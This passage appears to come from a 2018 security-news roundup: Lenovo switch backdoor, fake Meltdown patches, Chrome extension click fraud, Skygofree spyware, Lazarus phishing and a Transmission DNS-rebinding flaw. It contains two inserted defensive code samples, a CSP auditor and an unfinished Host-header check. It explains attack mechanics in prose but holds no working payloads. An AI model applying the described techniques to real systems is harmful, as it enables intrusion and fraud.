The problematic feature, introduced by Nortel in 2004 at the request of a customer, can be found in Lenovo devices and IBM Flex System, BladeCenter and RackSwitch switches that still use the ENOS firmware.

Lenovo patched the security hole with the release of ENOS 8.4.6.0 and also provided workarounds. The company says devices running the CNOS (Cloud Network Operating System) firmware are not vulnerable. IBM has also released firmware updates to fix the vulnerability in impacted switches.

Lenovo pointed out that the backdoor can only be exploited under specific circumstances.

“Lenovo is not aware of this mechanism being exploited, but we assume that its existence is known, and customers are advised to upgrade to firmware which eliminates it,” Lenovo said.


World Economic Forum Publishes Cyber Resiliency Playbook
17.1.2018 securityweek Cyber

World Economic Forum Publishes Playbook for Developing Cyber Resiliency Through Public/Private Collaboration

The World Economic Forum (WEF) has released a playbook for public-private collaboration to improve cyber resiliency ahead of the launch of a new Global Centre for Cybersecurity at the Annual Meeting 2018 taking place on January 23-26 in Davos, Switzerland.

The background to the WEF playbook is the complexity and sometimes conflicting requirements for governments to provide physical and cyber security for their citizens without unnecessarily intruding on personal privacy, and without damaging legitimate multinational businesses. Success, it claims, "depends on collaboration between the public and private sectors."

There are two sections to the playbook: a reference architecture for public-private collaboration, and cyber policy models. There is no attempt to provide a global norm in this process, nor a methodology for implementing individual policy models. It is an intra-country model, and implementation will depend upon each nation's unique values.

Fourteen separate policy topics are included, ranging from research and data sharing, through attribution, encryption, and active defense to cyber-insurance. Five key themes cross these topics: a clearly defined safe harbor for data sharing; legal clarity for the work of white hat researchers; the impact of a symmetrical international policy response; the cost and effect of compliance requirements; and software coding quality standards.

Each policy topic is then analyzed in relation to five areas: security, privacy, economic value, accountability and fairness. It is important at this point to note that the playbooks are designed for governments to develop public/private co-operation -- civil society issues are not seriously discussed.

For example, the first policy model deals with potential government approaches to zero-day vulnerabilities. The life-cycle of a zero-day comprises unknown existence in code; discovery; and exploitation and mitigation. While secure coding practices can limit the occurrence of zero-days, they "will continue to exist due to human error and other factors." Therefore, there needs to be a government policy towards zero-days.

The two primary options are for governments to "completely exit the zero-day market and avoid research dedicated to finding software vulnerabilities;" or to stockpile for own use, and/or disclose to vendors. The implications of the latter option are then discussed. Stockpiling without disclosure increases the likelihood that bad actors might also independently discover the vulnerability. Purchasing zero-days weakens the bug bounty programs since researchers are likely to sell to the highest bidder -- which is likely to be government.

The effect of a zero-day policy is then related to the five security areas. Increased exploitation of zero-days will hurt commerce (economy) and result in more breaches (privacy). Increased research and more sharing will be beneficial (security); while the sharing of zero-days applies pressure on vendors to more rapidly mitigate the vulnerabilities (accountability). Fairness is not implicated in the different policy choices.

This basic model of analyzing the policy topic, and then discussing the trade-offs with each of the five security areas (and their interaction) is applied to each of the 14 discussed policy topics. For example, 'active defense' is first defined to range from "technical interactions between a defender and an attacker" to "reciprocally inflicting damage on an alleged adversary".

One obvious danger is the potential for retaliatory escalation. "Responding to a nation-state adversary may trigger significant collateral obligations for a host state of would-be active defenders," warns the playbook. "As such, policy-makers may consider curtailing attempts to attack nation-states. Policy-makers might also consider curtailing the use of active defence techniques against more sophisticated non-state adversaries, as those adversaries may have a greater ability to obfuscate their identity and dangerously escalate a conflict."

The trade-offs on an active defense policy are then related to the five security areas. Expansive use of active defense will increase costs without necessarily having an economic return (economy). It would diminish privacy for both the alleged adversary and for any third-party collateral damage organizations (privacy). Any actual effect on overall security will likely depend upon its effectiveness as a deterrent (security). Only larger companies, and especially nation-backed industries such as the defense sector will likely have the means to employ active defense (fairness); but it is only a realistic option with more accurate attribution (accountability).

The intention of the playbook is simple, despite the thoroughness and complexity of its content. "The frameworks and discussions outlined in this document," it concludes, "endeavour to provide the basis for fruitful collaboration between the public and private sectors in securing shared digital spaces."

"We need to recognize cybersecurity as a public good and move beyond the polarizing rhetoric of the current security debate. Only through collective action can we hope to meet the global challenge of cybersecurity," said Daniel Dobrygowski, Project Lead for Cyber Resilience at the World Economic Forum.

While public/private dialog on security will of necessity be led by individual governments, the document provides an excellent overview of many of the security issues faced by commercial security teams. Although it contains no technical detail on security problems, it provides a detailed picture of the different implications from different approaches to the main security issues faced by all companies today.


Fake Meltdown/Spectre Patch Installs Malware
17.1.2018 securityweek
Virus

Cybercriminals are already taking advantage of the massive attention the recently detailed Meltdown and Spectre CPU flaws have received, in an attempt to trick users into installing malware instead, Malwarebytes warns.

Made public in early January, Meltdown and Spectre are two new side-channel attack methods against modern processors and are said to impact billions of devices. Based on vulnerabilities at the CPU level, the flaws allow malicious apps to access data as it is being processed, including passwords, photos, documents, emails, and the like.

Chip makers and vendors were alerted on the bugs last year, and some started working on patches for their users several months ago, but waited for a coordinated public disclosure set for last week. Apple, Microsoft, Google, Canonical, and IBM are just a few of the vendors that have already deployed patches.

Soon after the patches began rolling out, however, attacks taking advantage of the Meltdown/Spectre fever surfaced. One of them, Malwarebytes reports, is targeting German users with the SmokeLoader malware.

The attack was spotted soon after the German authorities issued a warning that phishing emails trying to take advantage of the infamous bugs had started to appear.

The emails appeared to come from the German Federal Office for Information Security (BSI), and Malwarebytes discovered a domain that also posed as the BSI website. Recently registered, the SSL-enabled phishing site isn’t affiliated with a legitimate or official government entity, but attempts to trick users into installing malware.

The website offers an information page that supposedly provides links to resources about Meltdown and Spectre, but it also links to a ZIP archive (Intel-AMD-SecurityPatch-11-01bsi.zip) that contains malware instead of the promised security patch.

Once a user downloads and runs the file, the SmokeLoader malware, which is capable of downloading and running additional payloads, is installed. The security researchers have observed the threat attempting to connect to various domains and sending encrypted information.

By analyzing the SSL certificate used by the fraudulent domain, the security researchers discovered other properties associated with the .bid domain, including a German template for a fake Adobe Flash Player update.

The security researchers have already contacted Comodo and CloudFlare to report the fraudulent website, and the domain stopped resolving within minutes after CloudFlare was informed of the issue.

“Online criminals are notorious for taking advantage of publicized events and rapidly exploiting them, typically via phishing campaigns. This particular one is interesting because people were told to apply a patch, which is exactly what the crooks are offering under disguise,” Malwarebytes concludes.


"PowerStager" Tool Employs Unique Obfuscation
17.1.2018 securityweek
Virus

A malicious tool that has managed to fly under the radar since April 2017 is showing great focus on obfuscation, in an attempt to evade detection, Palo Alto Networks warns.

Dubbed PowerStager, the tool has shown an uptick in usage for in-the-wild attacks around December 2017. Developed as a Python script that generates Windows executables using C source code, it uses multiple layers of obfuscation to launch PowerShell scripts to execute a shellcode payload.

PowerStager uses a unique obfuscation technique for PowerShell segments, while also offering increased flexibility, due to multiple configuration options.

Some of these options include the ability to target both x86 and x64 platforms, support for additional obfuscation on top of defaults, support for customized error messages/executable icon for social engineering, and the ability to use Meterpreter or other built-in shellcode payloads. The tool can also fetch remote payloads or embed them into the executable and can escalate privileges using UAC.

Analysis of executables created with the help of this tool revealed that they were being generated programmatically and that an embedded string for the file that gets created was included in each executable, Palo Alto’s Jeff White explains. The filename is also randomized between samples.

White identified a total of seven different PowerShell scripts that the tool can generate.

As of late December 2017, Palo Alto had observed 502 unique samples of PowerStager, mainly targeting Western European media and wholesale organizations. A large number of samples, however, were being used for testing and sales proof-of-concept demonstrations, the researcher says.

White also discovered that certain attributes that PowerStager defines when building the samples can be used to track them. There are also a series of characteristics specific to the generated samples. Although they are usually different between samples, they can prove useful for identification, especially when coupled with said unique obfuscation and PowerShell methods during dynamic analysis.

“While it’s not the most advanced toolset out there, the author has gone through a lot of trouble in attempting to obfuscate and make dynamic detection more difficult. PowerStager has covered a lot of the bases in obfuscation and flexibility well, but it hasn’t seen too much usage as of yet; however, it is on the rise and another tool to keep an eye on as it develops,” White concludes.


New KillDisk Variant Spotted in Latin America
17.1.2018 securityweek
Virus

A new variant of the disk-wiper malware known as KillDisk has been spotted by Trend Micro researchers in attacks aimed at financial organizations in Latin America.

The security firm is in the process of examining the new variant and the attacks, but an initial analysis showed that the Trojan appears to be delivered by a different piece of malware or it may be part of a bigger attack.

Early versions of KillDisk were designed to wipe hard drives in an effort to make systems inoperable. The malware was used by the Russia-linked threat actor BlackEnergy in the 2015 attack aimed at Ukraine’s energy sector.

Roughly one year after the Ukraine attack, researchers reported that its developers had turned KillDisk into file-encrypting ransomware. However, the samples analyzed at the time used the same encryption key for all instances, making it possible for victims to recover files.

Experts later reported seeing a KillDisk ransomware designed to target Linux machines, but the malware did not save encryption keys anywhere, making it impossible to recover files.

Some links have also been found between KillDisk and the NotPetya malware, which initially appeared to be a piece of ransomware but later turned out to be a disk wiper. NotPetya hit machines in more than 65 countries and major companies reported losing hundreds of millions of dollars as a result of the attack.

The latest variant, which Trend Micro tracks as TROJ_KILLDISK.IUB, goes back to its roots and focuses on deleting files and wiping the disk. The malware, designed to target Windows systems, goes through all drives in order to delete files, except for system files and folders.

It then proceeds to wipe the disk, which includes reading the master boot record (MBR) and overwriting the extended boot record (EBR). The file removal and disk wiping procedures involve overwriting files and disk sectors in order to make recovery more difficult.

Once files and partitions have been deleted and overwritten, the malware attempts to terminate several processes in an effort to reboot the infected machine. By targeting processes associated with the client/server runtime subsystem (csrss.exe), Windows start-up (wininit.exe), Windows logon (winlogon.exe), and the Local Security Authority Subsystem Service (lsass.exe), the malware can force a blue screen of death (BSOD), a logout, or a restart.

Trend Micro has promised to share more information on the new KillDisk variant as its investigation continues.


Half Million Impacted by Four Malicious Chrome Extensions
17.1.2018 securityweek
Virus

Four malicious Chrome extensions managed to infect over half a million users worldwide, including employees of major organizations, ICEBRG reports.

The extensions were likely used to conduct click fraud and/or search engine optimization (SEO) manipulation, but they could have also been used by threat actors to gain access to corporate networks and user information, the security company warns.

The malicious extensions were discovered after observing an unusual spike in outbound traffic volume from a customer workstation to a European VPS provider, ICEBRG reveals. The HTTP traffic was associated with the domain ‘change-request[.]info’ and was generated from a Chrome extension named Change HTTP Request Header.

While the extension itself does not contain “any overtly malicious code,” the researchers discovered a combination of “two items of concern” that could result in the injection and execution of arbitrary JavaScript code via the extension.

Chrome can execute JavaScript code contained within JSON, but, due to security concerns, extensions aren’t allowed to retrieve such JSON from an external source unless they explicitly request that capability via their Content Security Policy (CSP).

When the permission is enabled, however, the extension can retrieve and process JSON from an externally-controlled server, which allows extension authors to inject and execute arbitrary JavaScript code when the update server receives a request.
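The CSP relaxation described here (and in the earlier ICEBRG write-up above, where the same ‘unsafe-eval’ permission is discussed) is something a defender can check for directly in an extension's manifest.json before approving it for a fleet. The following is an added example, not ICEBRG's or Google's code: it parses the `content_security_policy` entry of a manifest, in both the Manifest V2 string form and the Manifest V3 object form, and flags a `script-src` that contains `'unsafe-eval'` or any remote origin. The sample manifests and the `https://updates.example` origin are constructed for the demonstration.

```javascript
// Added example (not code from the page or from ICEBRG/Google). Chrome's default
// extension CSP is "script-src 'self'; object-src 'self'", which blocks eval() and
// new Function() on fetched strings; an extension must opt in with 'unsafe-eval'.
// Manifest V2 stores the policy as a string; Manifest V3 stores an object with
// "extension_pages" and "sandbox" keys.

// Split a CSP string such as "script-src 'self' https://a.example; object-src 'self'"
// into a Map of directive name -> source list.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// Audit one CSP string; 'where' labels which manifest key it came from.
function auditCspString(policy, where) {
  const findings = [];
  const directives = parseCsp(policy);
  // script-src falls back to default-src when absent.
  const scriptSrc = directives.get('script-src') || directives.get('default-src') || [];
  if (scriptSrc.some((s) => s.toLowerCase() === "'unsafe-eval'")) {
    findings.push(`${where}: script-src allows 'unsafe-eval' (fetched JSON/strings can be executed)`);
  }
  // Any remote origin or wildcard in script-src widens the set of code the extension runs.
  for (const s of scriptSrc) {
    if (s === '*' || /^(https?:|wss?:)/i.test(s)) {
      findings.push(`${where}: script-src permits remote source ${s}`);
    }
  }
  return findings;
}

// Audit a parsed manifest object; returns an array of human-readable findings.
function auditManifest(manifest) {
  const csp = manifest.content_security_policy;
  if (csp === undefined) return []; // default policy applies: no eval, no remote scripts
  if (typeof csp === 'string') return auditCspString(csp, 'content_security_policy (MV2)');
  const findings = [];
  if (csp.extension_pages) findings.push(...auditCspString(csp.extension_pages, 'extension_pages (MV3)'));
  // Sandboxed pages may legitimately use 'unsafe-eval' but run in an isolated origin;
  // still report it so the reviewer sees where dynamic code can run.
  if (csp.sandbox) findings.push(...auditCspString(csp.sandbox, 'sandbox (MV3, isolated)'));
  return findings;
}

// Constructed sample manifests (not real extensions).
const DEFAULT_MANIFEST = { manifest_version: 2, name: 'Constructed: default CSP' };
const HARDENED_MV2 = {
  manifest_version: 2, name: 'Constructed: hardened',
  content_security_policy: "script-src 'self'; object-src 'self'",
};
const WEAK_MV2 = {
  manifest_version: 2, name: 'Constructed: weak',
  // Opts in to eval AND trusts a remote origin (hypothetical updates.example) for scripts.
  content_security_policy: "script-src 'self' 'unsafe-eval' https://updates.example; object-src 'self'",
};
const MV3_WITH_SANDBOX = {
  manifest_version: 3, name: 'Constructed: MV3',
  content_security_policy: {
    extension_pages: "script-src 'self'; object-src 'self'",
    sandbox: "sandbox allow-scripts; script-src 'self' 'unsafe-eval'",
  },
};

for (const m of [DEFAULT_MANIFEST, HARDENED_MV2, WEAK_MV2, MV3_WITH_SANDBOX]) {
  console.log(m.name, '->', auditManifest(m).length ? auditManifest(m) : 'no findings');
}
```

Run it with Node against a real manifest by reading the file with `JSON.parse` and passing the result to `auditManifest`; an empty result means the extension is running under Chrome's default policy, while any finding on `extension_pages` or a V2 string is the condition the ICEBRG analysis describes. Note that Manifest V3 already rejects `'unsafe-eval'` in `extension_pages`, so that finding should only ever appear for V2 manifests.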

What ICEBRG researchers discovered was that the Change HTTP Request Header extension could download obfuscated JSON files from ‘change-request[.]info’, via an ‘update_presets()’ function. The obfuscated code was observed checking for native Chrome debugging tools and halting the execution of the infected segment if such tools were detected.

After injection, the malicious JavaScript creates a WebSocket tunnel with ‘change-request[.]info’ and uses it to proxy browsing traffic via the victim’s browser.

“During the time of observation, the threat actor utilized this capability exclusively for visiting advertising related domains indicating a potential click fraud campaign was ongoing. Click fraud campaigns enable a malicious party to earn revenue by forcing victim systems to visit advertising sites that pay per click (PPC),” ICEBRG reports.

The capability, however, can also be used by the threat actor to browse internal sites of victim networks, thus effectively bypassing perimeter controls.

The security researchers also discovered that Change HTTP Request Header wasn’t the only Chrome extension designed to work in this manner. Nyoogle - Custom Logo for Google, Lite Bookmarks, and Stickies - Chrome's Post-it Notes show similar tactics, techniques, and procedures (TTPs) and feature the same command and control (C&C).

The Stickies extension was also observed using a different code injection pathway, but injecting JavaScript code nearly identical to that of other malicious extensions. It appears that the extension has a history of malicious behavior, as it was observed in early 2017 to be using the new code injection technique following an update.

“The inherent trust of third-party Google extensions, and accepted risk of user control over these extensions, allowed an expansive fraud campaign to succeed. In the hands of a sophisticated threat actor, the same tool and technique could have enabled a beachhead into target networks,” ICEBRG notes.

Considering the total installed user base of these malicious Chrome extensions, the malicious actor behind them has a substantial pool of resources to use for financial gain. Google, the National Cyber Security Centre of The Netherlands (NCSC-NL), the United States Computer Emergency Readiness Team (US-CERT), and customers who were directly impacted have been alerted to the issue.


Canadian Man Charged Over Leak of Three Billion Hacked Accounts
17.1.2018 securityweek Hacking

An Ontario man made his first court appearance Monday to answer charges of running a website that collected personal and password data from some three billion accounts, and sold them for profit.

Jordan Evan Bloom, 27, of Thornhill earned some Can$247,000 ($198,800 US) by selling the data for a "small fee" via leakedsource.com, the Royal Canadian Mounted Police said in a statement.

The information was stolen during massive hacks of websites including LinkedIn and the Ashley Madison online dating service.

Some of the data could also be used to access other popular websites if the hacked user used the same password and username combination, according to police.

Bloom was charged in December as part of a criminal probe dubbed "Project Adoration" focusing on trafficking in personal data, unauthorized use of computers, and possession of illicitly obtained property.

The probe lasted more than a year.

Authorities have shut down Bloom's website, but another with the same domain name hosted by servers in Russia is still operating.

"The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality," inspector Rafael Alvarado said in a statement.

Police noted that help from the Dutch National Police and the FBI was "essential" to the investigation.


Shared Accounts Increasingly Problematic for Critical Infrastructure: ICS-CERT
17.1.2018 securityweek ICS

Assessments conducted last year by the U.S. Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) showed that boundary protection remains the biggest problem in critical infrastructure organizations, but identification and authentication issues have become increasingly common.

Critical infrastructure owners and operators can ask ICS-CERT to conduct onsite cybersecurity assessments of their industrial control systems (ICS) in order to help them strengthen their cybersecurity posture.

In 2017, ICS-CERT conducted 176 assessments, which represents a 35 percent increase compared to the previous year. The agency analyzed organizations in eight critical infrastructure sectors, but more than two-thirds of the assessments targeted the energy and water and wastewater systems sectors.

The highest number of assessments were conducted in Texas (27), followed by Alaska (20), Nebraska (15), New York (14), Washington (13), Idaho (12), Nevada (10) and Arizona (10).

ICS-CERT identified 753 issues as part of 137 architecture design reviews and network traffic analyses. The six most common weaknesses, which accounted for roughly one-third of the total, were related to network boundary protection, identification and authentication, allocation of resources, physical access controls, account management, and least functionality.

Security issues found during ICS-CERT assessments

Improper network boundary protection, which includes inadequate boundaries between enterprise and ICS networks and the inability to detect unauthorized activity on critical systems, has been the most common type of weakness since 2014.

As for identification and authentication issues, these can include the lack of mechanisms for tracing user actions if an account gets compromised, and increased difficulty in securing accounts belonging to former employees, particularly ones with administrator access.

Identification and authentication issues first made ICS-CERT’s top six weakness categories in 2015, when they were in fourth position. In 2016 they moved up one position, and last year they were the second most common security weakness.

Of all the identification and authentication issues, shared and group accounts are particularly concerning.

“[Shared and group accounts] make it difficult to identify the actual user and they allow malicious parties to use them with anonymity. Accounts used by a shared group of users typically have poor passwords that malicious actors can easily guess and that users do not change frequently or when a member of the group leaves,” ICS-CERT said in its latest Monitor report.

Allocation of resources for cybersecurity is also a problem in many critical infrastructure organizations. ICS-CERT’s assessment teams noticed that many sites are short-staffed and in many cases there is no backup personnel.

“Although some sites had started planning or attrition of staff, many did not have a plan to address loss of key personnel. One site had seven key personnel, four of whom would be eligible for retirement next year,” the agency said.

While its assessments do not focus on physical access controls, ICS-CERT has often noticed that organizations fail to ensure that ICS components are physically accessible only to authorized personnel.

“The team observed cases where infrastructure (i.e., routers and switches) was in company space but accessible to staff with no need to have physical access. Other cases included ICS components in public areas without any physical restrictions (i.e., locked doors or enclosures) to prevent access from a passerby. Some sites did not have locked doors to the operations plant, which would allow anyone to walk in and potentially have access to control system components,” ICS-CERT explained.


Flaws Allowed Facebook Account Hacking via Oculus App
17.1.2018 securityweek Social

Facebook recently patched a couple of vulnerabilities that could have been exploited by malicious hackers to hijack accounts by abusing integration with the Oculus virtual reality headset.

Facebook announced the acquisition of Oculus VR back in July 2014 and added Oculus assets to its bug bounty program a few weeks later. Several vulnerabilities have been found in Oculus services since, including a series of flaws that earned a researcher $25,000.

In October, web security consultant Josip Franjković decided to analyze the Oculus application for Windows, which includes social features that allow users to connect their Facebook account.

Franjkovic discovered that a malicious actor could have used specially crafted GraphQL queries to connect a targeted user’s Facebook account to the attacker’s Oculus account. GraphQL is a query language created by Facebook in 2012 and later released to the public.

According to the researcher, a specially crafted query allowed an attacker to obtain the victim’s access token, which under normal circumstances should not be accessible to third-party apps, and use it to take control of their Facebook account.

Franjkovic demonstrated an account takeover method by using a specially crafted query to add a new mobile phone number to the targeted account and then leveraging that number to reset the victim’s password.

The vulnerability was reported to Facebook on October 24 and a temporary fix, which involved disabling the facebook_login_sso endpoint, was implemented on the same day. A permanent patch was rolled out on October 30.

A few weeks later, the expert discovered a login cross-site request forgery (CSRF) flaw that could have been exploited to bypass Facebook’s patch.

This second flaw was reported to Facebook on November 18 and again the facebook_login_sso endpoint was disabled on the same day as a temporary fix. A complete patch was implemented roughly three weeks later.

The researcher has not disclosed the amount of money he earned from Facebook for finding the vulnerabilities, but he told SecurityWeek that the social media giant classified the issues as critical and he was happy with the reward he received.

Facebook revealed last week that it had paid a total of $880,000 in bug bounties in 2017, with an average of roughly $1,900 per submission.

Technical details for the vulnerabilities can be found on Franjkovic’s blog. In the past years, the expert reported several vulnerabilities to Facebook, including ones that could be exploited to hijack accounts.


BlackBerry Launches Security Product for Automotive, Other Industries
17.1.2018 securityweek IT

BlackBerry announced on Monday the launch of Jarvis, a new cybersecurity service designed to help companies in the automotive and other sectors find vulnerabilities in their software.

Jarvis has been described by BlackBerry as a cloud-based static binary code analysis software-as-a-service (SaaS) product. The tool is currently used by automakers, including Britain’s largest car maker, Jaguar Land Rover, but BlackBerry says it is ideal for other types of organizations as well, including in the healthcare, aerospace, defense, and industrial automation sectors.

Modern cars use hundreds of software components, including many provided by third-party vendors across several tiers. While this approach has some advantages, it also increases the chances of vulnerabilities making it into the software somewhere along the supply chain.

Jarvis aims to address this issue by scanning code and offering actionable information within minutes. In addition to finding vulnerabilities, the service also helps ensure compliance with various standards.

BlackBerry claims the new product performs tasks that would require a large number of experts and a lot of time, which should help companies save money. The tool can be integrated with existing development tools and APIs.

“Connected and autonomous vehicles require some of the most complex software ever developed, creating a significant challenge for automakers who must ensure the code complies with industry and manufacturer-specific standards while simultaneously battle-hardening a very large and tempting attack surface for cybercriminals,” said John Chen, executive chairman and CEO of BlackBerry.

“Jarvis is a game-changer for OEMs because for the first time they have a complete, consistent, and near real-time view into the security posture of a vehicle's entire code base along with the insights and deep learning needed to predict and fix vulnerabilities, ensure compliance, and remain a step ahead of bad actors,” Chen added.

Jarvis is an online tool that can be used by companies as a pay-as-you-go service. The product can be customized for each organization’s needs and their specific supply chain, allowing them to scan code at every stage of the development process.


Kaspersky Discovers Powerful Mobile Spyware
17.1.2018 securityweek Android

Kaspersky Lab has shared details of a sophisticated, multi-stage mobile spyware that gives attackers the ability to take over an infected Android device, with advanced features that have never been seen before in other mobile threats.

Named Skygofree, the mobile implant has been active since 2014 and has the ability to record nearby conversations and noise when an infected device enters a specified location.

Other advanced functions that have never been seen before include using Android’s Accessibility Services to access WhatsApp messages and the ability to connect an infected device to Wi-Fi networks controlled by the attackers.

“The implant carries multiple exploits for root access and is also capable of taking pictures and videos, seizing call records, SMS, geolocation, calendar events and business-related information stored in the device’s memory,” Kaspersky explained.

Furthermore, a special feature enables it to circumvent a battery-saving technique used on China-made Huawei devices by adding itself to the list of ‘protected apps’ so that it is not switched off automatically when the screen is off.

"Due to this feature, it is clear that the developers paid special attention to the work of the implant on Huawei devices," Kaspersky's researchers noted.

Kaspersky said the malware, which is designed for targeted cyber-surveillance, could be an offensive security product used for law enforcement purposes, similar to products offered by Hacking Team, a controversial Italy-based company that develops and sells surveillance technology to governments around the world.

Kaspersky did not provide statistics on the number of Android devices that may have been infected, but the number appears to be relatively small. There are “several infected individuals,” all located in Italy, Kaspersky said.

“Given the artefacts we discovered in the malware code and our analysis of the infrastructure, we have a high level of confidence that the developer behind the Skygofree implants is an Italian IT company that offers surveillance solutions, rather like HackingTeam,” said Alexey Firsh, Malware Analyst, Targeted Attacks Research, Kaspersky Lab.

The operators used spoofed landing pages that mimic the sites of mobile operators for spreading the implant, and Kaspersky’s researchers found 48 different commands that can be leveraged by the attackers.

Kaspersky provided technical analysis on Skygofree in an associated blog post, including an overview of the various commands, along with details on a number of modules that target computers running Microsoft Windows.

“High end mobile malware is very difficult to identify and block and the developers behind Skygofree have clearly used this to their advantage: creating and evolving an implant that can spy extensively on targets without arousing suspicion,” Firsh said.

The attacks are ongoing and the most recent domain was registered in October 2017.


North Korean Hackers Prep Attacks Against Cryptocurrency Exchanges: Report
17.1.2018 securityweek BigBrothers

Researchers Say a North Korea-Linked Hacking Campaign is Ready to Go Against South Korean Cryptocurrency Exchanges

North Korean hackers, loosely categorized as the Lazarus Group, have continued their attacks against South Korean interests, with particular emphasis on cryptocurrency exchanges.

Recorded Future has published details of a campaign it discovered in late 2017, which does not yet appear to be active. This may be in recognition of, or because of, the current discussions between North and South over North Korea's potential involvement in South Korea's Winter Olympics being held in Pyeongchang in February -- or it could simply be that the campaign development has not yet been put in action.

Recorded Future said they discovered a spear-phishing campaign that uses the CVE-2017-8291 Ghostscript vulnerability triggered from within a Hangul Word Processor (popular in South Korea) document.

For now, the bilateral discussions between North and South seem to be fruitful. It is reported that North Korea will send a 140-member orchestra to the Games, and there are ongoing discussions over the two countries fielding a joint women's hockey team. Nevertheless, Recorded Future researcher Priscilla Moriuchi told SecurityWeek that the campaign is in place and could be easily invoked.

Earlier this month, McAfee described a separate attack against North Korean defectors from a group -- almost certainly North Korean -- that does not appear to be related to any known cybercrime group.

Recorded Future notes that the techniques used in that attack "are unusual for the Lazarus Group. These include leveraging PowerShell, HTA, JavaScript, and Python, none of which are common in Lazarus operations over the last eight years." This new campaign, however, "showcases a clear use of Lazarus TTPs to target cryptocurrency exchanges and social institutions in South Korea."

The Lazarus targets are users of the Coinlink cryptocurrency exchange, other exchanges, and a group known as 'Friends of MOFA (Ministry of Foreign Affairs)'.

The cryptocurrency target is typical Lazarus. "Beginning in 2016," notes Recorded Future, "researchers discovered a shift in North Korean operations toward attacks against financial institutions designed to steal money and generate funds for the Kim regime." Lazarus is believed to be behind the 2016 attacks on the SWIFT global banking network, including the theft of $81 million from the Bangladesh central bank in February 2016.

In December 2017, the South Korean Youbit cryptocurrency exchange went bankrupt following its second hack of the year. In the first attack it lost 4000 bitcoin or around 40% of its reserves (around $5 million at the time), and a further 17% of its assets in the December breach. Some reports suggest that the attacks were undertaken by BlueNoroff, a sub-group of Lazarus.

South Korean exchanges have been strengthening their network defenses, while the government has been considering regulations to tighten control over cryptocurrencies. One mooted option has been the shutdown of all virtual cryptocurrency exchanges, although a statement from the Office for Government Policy Coordination on Monday downplayed a comment from Justice Minister Park Sang-ki last week. The Justice Minister's statement suggested the government is already working on legislation to ban virtual exchanges in the country. The current view is that a ban is not imminent, although stricter regulation is likely.

Whatever happens, hacking South Korean cryptocurrency exchanges will become more difficult in the future. "The majority of North Korean cryptocurrency operations have targeted South Korean users and exchanges, but we expect this trend to change in 2018. We assess that as South Korea responds to these attempted thefts by increasing security, they will become harder targets, forcing North Korean actors to look to exchanges and users in other countries as well."

Noticeably, Recorded Future warns that although this campaign and toolset are specific to the Hangul Word Processor, the actual vulnerability it exploits is not. "This vulnerability is for the Ghostscript suite and affects a wide range of products, and while this particular version is triggered from within an embedded PostScript in an HWP document, it could easily be adapted to other software."

"The main targets and victims of North Korean cryptocurrency operations in 2017 were South Korean," Moriuchi told SecurityWeek. "As a result of that targeting, the South Korean regulators are attempting to impose stricter financial controls on exchanges, and the exchanges are also implementing stricter security measures both for their users and within their networks. We believe that these factors will lead North Korea -- which is clearly invested in cryptocurrency operations -- to pursue other targets in other countries because the South Korean targets are becoming harder to get at."

This campaign is delivered by spear-phishing emails. Four separate lures have been identified: one aimed at users of Coinlink; two that appear to be resumes stolen from two genuine South Korean computer scientists who work at cryptocurrency exchanges; and one lifted from a blog run by the Friends of MOFA. All of the lure documents were created between mid-October and late November.

"This campaign relies on multiple payloads fashioned out of the Destover infostealer code to collect information about the victim system and exfiltrate files," reports Recorded Future. Destover further implicates Lazarus in the campaign. It was used in the Sony Pictures Entertainment attack in 2014, the Polish banking attacks in January 2017, and in the first WannaCry victim discovered by Symantec.

Recorded Future does not believe that any improving relations between North and South Korea will stop Lazarus targeting South Korea. The campaign could kick off at any time. But the suggestion is that as attacking South Korean exchanges becomes more difficult and less fruitful, the same attack could relatively easily be re-engineered for different exchanges in different countries.


Code Execution Flaw Found in Transmission BitTorrent App
17.1.2018 securityweek Vulnerability

Google Project Zero researcher Tavis Ormandy has discovered a critical remote code execution vulnerability in the Transmission BitTorrent client. The expert has proposed a fix, but it has yet to be implemented by the application’s developers.

Transmission is a popular open source BitTorrent client that is available for Windows, Mac and Linux. Ormandy has been analyzing several popular torrent clients and found that Transmission has a serious vulnerability.

According to the researcher, an attacker can execute code on a system running Transmission by getting the targeted user to access a specially crafted website.

“The Transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc,” Ormandy explained in an advisory. “Clients interact with the daemon using JSON RPC requests to a web server listening on port 9091. By default, the daemon will only accept requests from localhost.”

However, the expert showed that the localhost requirement can be bypassed using a type of attack called “DNS rebinding.”

The attacker sets up a website and adds an iframe that points to a subdomain of that site. The DNS server is configured to respond alternately with an address controlled by the attacker and localhost (127.0.0.1), with a short time to live (TTL). When the victim visits the malicious website, the browser first resolves the subdomain to the attacker-controlled address and, once the short TTL expires, re-resolves it to localhost.
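The reason a "localhost only" rule does not stop this is that after rebinding the request really does arrive from 127.0.0.1; what still betrays it is the Host header, which the browser fills with the attacker's hostname rather than with localhost. The code below is an added example illustrating that distinction, not Transmission's code or Ormandy's patch: a small parser for one HTTP request plus a check that accepts a request for a loopback-bound RPC service only when both the TCP peer and the Host header are local. The hostnames, port and request bodies are constructed for the demonstration.

```python
"""Host-header allowlist for a localhost-only JSON-RPC service.

Added example, not Transmission's code. Shows why a source-IP check alone
does not stop DNS rebinding: the rebound request comes from 127.0.0.1, but
the browser still sends the attacker's hostname in the Host header.
"""
import ipaddress
from typing import Optional

# Hostnames that legitimately address the local daemon (assumed set).
LOCAL_HOSTNAMES = {"localhost", "localhost.localdomain"}


def _strip_port(host: str) -> str:
    """Drop an optional :port ('127.0.0.1:9091', '[::1]:9091', 'localhost')."""
    if host.startswith("["):                 # bracketed IPv6 literal
        end = host.find("]")
        return host[1:end] if end != -1 else host
    if host.count(":") == 1:                 # name:port or IPv4:port
        return host.rsplit(":", 1)[0]
    return host                              # bare name or bare IPv6


def host_header_is_local(host_value: Optional[str], extra_allowed=()) -> bool:
    """True if the Host header names the local machine (or an allowlisted name)."""
    if not host_value:
        return False                         # HTTP/1.1 requires Host; absence is untrusted
    name = _strip_port(host_value.strip()).lower()
    if name in LOCAL_HOSTNAMES or name in {h.lower() for h in extra_allowed}:
        return True
    try:
        return ipaddress.ip_address(name).is_loopback
    except ValueError:
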